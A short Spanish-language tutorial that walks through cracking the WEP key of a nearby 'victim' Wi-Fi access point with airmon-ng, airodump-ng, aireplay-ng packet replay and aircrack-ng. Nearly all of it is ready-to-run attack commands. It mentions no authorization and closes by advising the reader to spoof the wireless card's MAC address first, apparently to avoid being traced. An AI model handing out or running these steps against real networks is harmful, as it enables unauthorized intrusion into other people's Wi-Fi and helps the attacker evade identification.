Detenemos la interfaz de red que vamos a utilizar con el comando ifconfig:
#ifconfig <interfaz de red> down
Ponemos la interfaz en modo monitor:
#airmon-ng start <interfaz de red>
escaneamos las redes a nuestro alcance con airodump-ng
#airodump-ng <interfaz de red>
Una vez elegida una red con cifrado WEP y que tengamos buena señal paramos el airodump-ng anterior e introducimos el comando siguiente:
# airodump-ng -w <archivo de captura> --bssid <MAC del AP> -c <canal del AP victima> <interfaz de red>
Ahora realizamos el ataque al punto de acceso con cifrado WEP utilizando el comando aireplay-ng:
Con este primer comando nos asociamos al AP:
# aireplay-ng -1 10 -e <nombre del AP> -a <MAC del AP> -h <nuestra MAC> <interfaz de red>
Una vez asociado al AP :-) reinyectamos paquetes para que suba el campo #Data en la ventana del airodump-ng
# aireplay-ng -3 -b <MAC del AP> -h <nuestra MAC> <interfaz de red>
Una vez que veamos que en el campo data tenemos unos cuantos pauqtes, mas de 20.000 podemos empezar a intentar conseguir la contraseña con el comando aircrack-ng
# aircrack-ng <archivo de captura>
Es recomendable cambiar antes la mac de nuestra tarjeta wifi, para ello se puede utilizar el macchanger.
#macchanger -m <falsa MAC>
o el comando ifconfig:
#ifconfig eth0 hw ether <falsa MAC>
Nota: WEP significa Wired Equivalent Privacy o "Privacidad Equivalente a Cableado".